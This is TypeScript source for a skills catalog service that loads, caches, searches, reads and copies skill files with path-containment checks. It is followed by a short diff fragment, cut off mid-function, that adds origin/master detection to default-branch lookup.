if (!existsSync(catalogManifestPath)) {
throw new Error(
`Skills catalog manifest not found at ${catalogManifestPath}. Run pnpm --filter @paperclipai/skills-catalog build:manifest.`,
);
}
return JSON.parse(readFileSync(catalogManifestPath, "utf8")) as CatalogManifestFile;
}
function getCatalogManifest() {
if (!existsSync(catalogManifestPath)) {
throw new Error(
`Skills catalog manifest not found at ${catalogManifestPath}. Run pnpm --filter @paperclipai/skills-catalog build:manifest.`,
);
}
const stats = statSync(catalogManifestPath);
if (
cachedCatalogManifest &&
cachedCatalogManifest.mtimeMs === stats.mtimeMs &&
cachedCatalogManifest.size === stats.size
) {
return cachedCatalogManifest.manifest;
}
const manifest = loadCatalogManifest();
cachedCatalogManifest = {
manifest,
mtimeMs: stats.mtimeMs,
size: stats.size,
};
return manifest;
}
function getCatalogSkills() {
const catalogManifest = getCatalogManifest();
return catalogManifest.skills.map((skill) => ({
...skill,
packageName: catalogManifest.packageName,
packageVersion: catalogManifest.packageVersion,
}));
}
function isMarkdownPath(filePath: string) {
const fileName = path.posix.basename(filePath).toLowerCase();
return fileName === "skill.md" || fileName.endsWith(".md");
}
function inferLanguageFromPath(filePath: string) {
const fileName = path.posix.basename(filePath).toLowerCase();
if (fileName === "skill.md" || fileName.endsWith(".md")) return "markdown";
if (fileName.endsWith(".ts")) return "typescript";
if (fileName.endsWith(".tsx")) return "tsx";
if (fileName.endsWith(".js")) return "javascript";
if (fileName.endsWith(".jsx")) return "jsx";
if (fileName.endsWith(".json")) return "json";
if (fileName.endsWith(".yml") || fileName.endsWith(".yaml")) return "yaml";
if (fileName.endsWith(".sh")) return "bash";
if (fileName.endsWith(".py")) return "python";
if (fileName.endsWith(".html")) return "html";
if (fileName.endsWith(".css")) return "css";
return null;
}
function resolveCatalogPackageRoot() {
return catalogPackageRoot;
}
function searchText(skill: CatalogSkill) {
return [
skill.id,
skill.key,
skill.slug,
skill.name,
skill.description,
skill.category,
skill.kind,
...skill.recommendedForRoles,
...skill.tags,
].join("\n").toLowerCase();
}
export function listCatalogSkills(query: CatalogSkillListQuery = {}): CatalogSkill[] {
const normalizedQuery = query.q?.trim().toLowerCase() ?? "";
return getCatalogSkills()
.filter((skill) => !query.kind || skill.kind === query.kind)
.filter((skill) => !query.category || skill.category === query.category)
.filter((skill) => !normalizedQuery || searchText(skill).includes(normalizedQuery))
.sort((left, right) => left.name.localeCompare(right.name) || left.key.localeCompare(right.key));
}
export function resolveCatalogSkillReference(reference: string): { skill: CatalogSkill | null; ambiguous: boolean } {
const trimmed = reference.trim();
if (!trimmed) return { skill: null, ambiguous: false };
const catalogSkills = getCatalogSkills();
const exact = catalogSkills.find((skill) => skill.id === trimmed || skill.key === trimmed);
if (exact) return { skill: exact, ambiguous: false };
const slugMatches = catalogSkills.filter((skill) => skill.slug === trimmed);
if (slugMatches.length === 1) return { skill: slugMatches[0]!, ambiguous: false };
if (slugMatches.length > 1) return { skill: null, ambiguous: true };
return { skill: null, ambiguous: false };
}
export function getCatalogSkillOrThrow(reference: string): CatalogSkill {
const result = resolveCatalogSkillReference(reference);
if (result.ambiguous) {
throw conflict(`Catalog skill slug "${reference}" is ambiguous. Use an id or key.`);
}
if (!result.skill) {
throw notFound("Catalog skill not found");
}
return result.skill;
}
export async function readCatalogSkillFile(
reference: string,
relativePath = "SKILL.md",
): Promise<CatalogSkillFileDetail> {
const skill = getCatalogSkillOrThrow(reference);
const normalizedPath = normalizePortablePath(relativePath || "SKILL.md");
const fileEntry = skill.files.find((entry) => entry.path === normalizedPath);
if (!fileEntry) {
throw notFound("Catalog skill file not found");
}
const packageRoot = resolveCatalogPackageRoot();
const absolutePath = path.resolve(packageRoot, skill.path, normalizedPath);
const skillRoot = path.resolve(packageRoot, skill.path);
if (absolutePath !== skillRoot && !absolutePath.startsWith(`${skillRoot}${path.sep}`)) {
throw notFound("Catalog skill file not found");
}
if (fileEntry.kind === "asset") {
throw new HttpError(415, "Catalog asset previews are not supported.");
}
const content = await fs.readFile(absolutePath, "utf8");
return {
catalogSkillId: skill.id,
path: normalizedPath,
kind: fileEntry.kind,
content,
language: inferLanguageFromPath(normalizedPath),
markdown: isMarkdownPath(normalizedPath),
};
}
export async function copyCatalogSkillFile(reference: string, relativePath: string, targetPath: string): Promise<void> {
const skill = getCatalogSkillOrThrow(reference);
const normalizedPath = normalizePortablePath(relativePath || "SKILL.md");
const fileEntry = skill.files.find((entry) => entry.path === normalizedPath);
if (!fileEntry) {
throw notFound("Catalog skill file not found");
}
const packageRoot = resolveCatalogPackageRoot();
const absolutePath = path.resolve(packageRoot, skill.path, normalizedPath);
const skillRoot = path.resolve(packageRoot, skill.path);
if (absolutePath !== skillRoot && !absolutePath.startsWith(`${skillRoot}${path.sep}`)) {
throw notFound("Catalog skill file not found");
}
await fs.copyFile(absolutePath, targetPath);
}
export function getCatalogPackageMetadata() {
const catalogManifest = getCatalogManifest();
return {
packageName: catalogManifest.packageName,
packageVersion: catalogManifest.packageVersion,
};
}

6
server/src/services/workspace-runtime.ts
View file

@ -691,6 +691,12 @@ async function isGitCheckout(cwd: string): Promise<boolean> {
}
async function detectDefaultBranch(repoRoot: string): Promise<string | null> {
const originMasterRef = "origin/master";
await refreshRemoteTrackingBaseRef(repoRoot, originMasterRef);
if (await resolveBaseRefSha(repoRoot, originMasterRef)) {
return originMasterRef;
}
// Try the explicit remote HEAD first (set by git clone or git remote set-head)
try {
const remoteHead = await runGit(